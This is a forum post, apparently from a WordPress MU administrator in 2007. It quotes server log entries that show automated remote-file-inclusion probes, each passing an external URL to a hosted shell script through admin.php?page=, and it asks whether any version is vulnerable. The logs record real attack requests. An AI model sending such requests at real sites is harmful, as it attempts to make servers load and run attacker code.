xiand0I get a whole lot of these in my logs right now - from numerous different IP adresses.
213.195.77.225 - - [16/Aug/2007:13:58:19 -0400] "GET /2007/07/23/4/admin.php?page=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
213.195.77.225 - - [16/Aug/2007:13:58:19 -0400] "GET /admin.php?page=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
213.195.77.225 - - [16/Aug/2007:13:58:20 -0400] "GET /2007/07/23/admin.php?page=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
213.195.77.225 - - [16/Aug/2007:13:58:20 -0400] "GET /2007/07/23/4/admin.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
213.195.77.225 - - [16/Aug/2007:13:58:20 -0400] "GET /admin.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
213.195.77.225 - - [16/Aug/2007:13:58:21 -0400] "GET /2007/07/23/admin.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
Now, it must be mentioned that WPMU 1.2.4 does not comply with loading those external ?page= URLs and these "hacking" attempts (or whatever you call it) are just a waste of CPU/BW and annoying, not dangerous.
But I thought I'd mention this anyway, since - and note that this is guesswork - this MAY be some exploit which works on some old(?) WP or WPMU version. I don't know. But it may be a good idea to check if your WPMU will load admin.php?page=http://external.tld/somepage url's and it'd be nice to clarify if there is any version of WP/WPMU where this actually works. This does not seem to work on my WPMU 1.2.4, but it does seem apparent that it works on SOME WP/WPMU version since these f**kheads keep on scanning to see if it works.
